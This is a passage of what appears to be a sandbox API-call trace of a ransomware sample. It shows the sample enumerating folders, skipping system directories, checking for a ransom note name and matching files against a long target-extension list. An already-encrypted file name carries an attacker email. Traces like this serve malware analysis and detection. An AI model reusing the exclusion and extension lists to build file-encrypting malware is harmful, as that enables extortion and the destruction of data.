	[0199.615] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0199.615] CloseHandle (hObject=0x384) returned 1
	[0199.615] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ec9c4f0, ftCreationTime.dwHighDateTime=0x1d97226, ftLastAccessTime.dwLowDateTime=0x907e4062, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9080a505, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0199.615] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*") returned 53
	[0199.615] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.615] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\*.*", cchLength=0x35 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*") returned 0x35
	[0199.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.616] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="windows") returned 0x0
	[0199.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.616] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="boot") returned 0x0
	[0199.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.616] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="system volume information") returned 0x0
	[0199.616] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.617] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0199.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.617] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="temp") returned 0x0
	[0199.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.617] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="program files") returned 0x0
	[0199.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.617] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="program files (x86)") returned 0x0
	[0199.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.618] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="appdata") returned 0x0
	[0199.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.618] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="application data") returned 0x0
	[0199.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.618] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="winnt") returned 0x0
	[0199.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.618] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="tmp") returned 0x0
	[0199.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.619] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="cache") returned 0x0
	[0199.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.619] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="temporary internet files") returned 0x0
	[0199.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.619] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="webcache") returned 0x0
	[0199.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.620] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="inetcache") returned 0x0
	[0199.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.620] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="nvidia") returned 0x0
	[0199.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.620] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="packages") returned 0x0
	[0199.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.620] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="cookies") returned 0x0
	[0199.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.621] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\*.*", lpSrch="programdata") returned 0x0
	[0199.621] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0199.621] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0199.621] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ec9c4f0, ftCreationTime.dwHighDateTime=0x1d97226, ftLastAccessTime.dwLowDateTime=0x907e4062, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x9080a505, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0199.621] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0199.621] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90797d3f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90797d3f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90797d3f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x6d40, dwReserved0=0x0, dwReserved1=0x0, cFileName="5vrihtsjyx.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="5VRIHT~1.SCL")) returned 1
	[0199.621] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b905640, ftCreationTime.dwHighDateTime=0x1d9755e, ftLastAccessTime.dwLowDateTime=0xf32675e0, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xf32675e0, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6uMJ9SfOMg6Z58WFzT", cAlternateFileName="6UMJ9S~1")) returned 1
	[0199.621] lstrcmpW (lpString1="6uMJ9SfOMg6Z58WFzT", lpString2="..") returned 1
	[0199.622] lstrcmpW (lpString1="6uMJ9SfOMg6Z58WFzT", lpString2=".") returned 1
	[0199.622] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ"
	[0199.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\"
	[0199.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\", lpString2="6uMJ9SfOMg6Z58WFzT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT"
	[0199.622] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT"
	[0199.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0199.622] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0199.622] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*"
	[0199.623] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b905640, ftCreationTime.dwHighDateTime=0x1d9755e, ftLastAccessTime.dwLowDateTime=0xf32675e0, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xf32675e0, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0199.623] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*") returned 72
	[0199.623] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.623] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\*.*", cchLength=0x48 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*") returned 0x48
	[0199.623] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="windows") returned 0x0
	[0199.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="boot") returned 0x0
	[0199.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="system volume information") returned 0x0
	[0199.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.624] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0199.624] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="temp") returned 0x0
	[0199.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="program files") returned 0x0
	[0199.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="program files (x86)") returned 0x0
	[0199.625] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.625] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="appdata") returned 0x0
	[0199.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.626] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="application data") returned 0x0
	[0199.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.626] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="winnt") returned 0x0
	[0199.626] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.732] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="tmp") returned 0x0
	[0199.732] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.732] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="cache") returned 0x0
	[0199.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.733] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="temporary internet files") returned 0x0
	[0199.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.733] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="webcache") returned 0x0
	[0199.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.733] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="inetcache") returned 0x0
	[0199.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.734] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="nvidia") returned 0x0
	[0199.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.734] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="packages") returned 0x0
	[0199.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.734] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="cookies") returned 0x0
	[0199.734] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.734] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\*.*", lpSrch="programdata") returned 0x0
	[0199.734] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b905640, ftCreationTime.dwHighDateTime=0x1d9755e, ftLastAccessTime.dwLowDateTime=0xf32675e0, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xf32675e0, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0199.735] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x969c9090, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0xf1289650, ftLastAccessTime.dwHighDateTime=0x1d97158, ftLastWriteTime.dwLowDateTime=0xf1289650, ftLastWriteTime.dwHighDateTime=0x1d97158, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3zsYUlznS BE", cAlternateFileName="3ZSYUL~1")) returned 1
	[0199.735] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20d74b10, ftCreationTime.dwHighDateTime=0x1d970a7, ftLastAccessTime.dwLowDateTime=0xcf0dd8f0, ftLastAccessTime.dwHighDateTime=0x1d97405, ftLastWriteTime.dwLowDateTime=0xcf0dd8f0, ftLastWriteTime.dwHighDateTime=0x1d97405, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="a-_m2", cAlternateFileName="")) returned 1
	[0199.735] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4221e980, ftCreationTime.dwHighDateTime=0x1d973d4, ftLastAccessTime.dwLowDateTime=0x3b83c020, ftLastAccessTime.dwHighDateTime=0x1d9740c, ftLastWriteTime.dwLowDateTime=0x3b83c020, ftLastWriteTime.dwHighDateTime=0x1d9740c, nFileSizeHigh=0x0, nFileSizeLow=0xb93f, dwReserved0=0x0, dwReserved1=0x0, cFileName="a5PPAnDIWMmY.avi", cAlternateFileName="A5PPAN~1.AVI")) returned 1
	[0199.735] lstrcmpW (lpString1="a5PPAnDIWMmY.avi", lpString2="..") returned 1
	[0199.735] lstrcmpW (lpString1="a5PPAnDIWMmY.avi", lpString2=".") returned 1
	[0199.735] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\"
	[0199.735] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\", lpString2="a5PPAnDIWMmY.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a5PPAnDIWMmY.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a5PPAnDIWMmY.avi"
	[0199.735] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a5PPAnDIWMmY.avi") returned 85
	[0199.735] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0199.736] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a5PPAnDIWMmY.avi", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a5ppandiwmmy.avi") returned 0x55
	[0199.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.737] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a5ppandiwmmy.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0199.737] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a5ppandiwmmy.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a5ppandiwmmy.avi") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a5ppandiwmmy.avi"
	[0199.737] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a5ppandiwmmy.avi") returned 85
	[0199.737] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0199.737] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.738] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0199.738] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0199.738] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt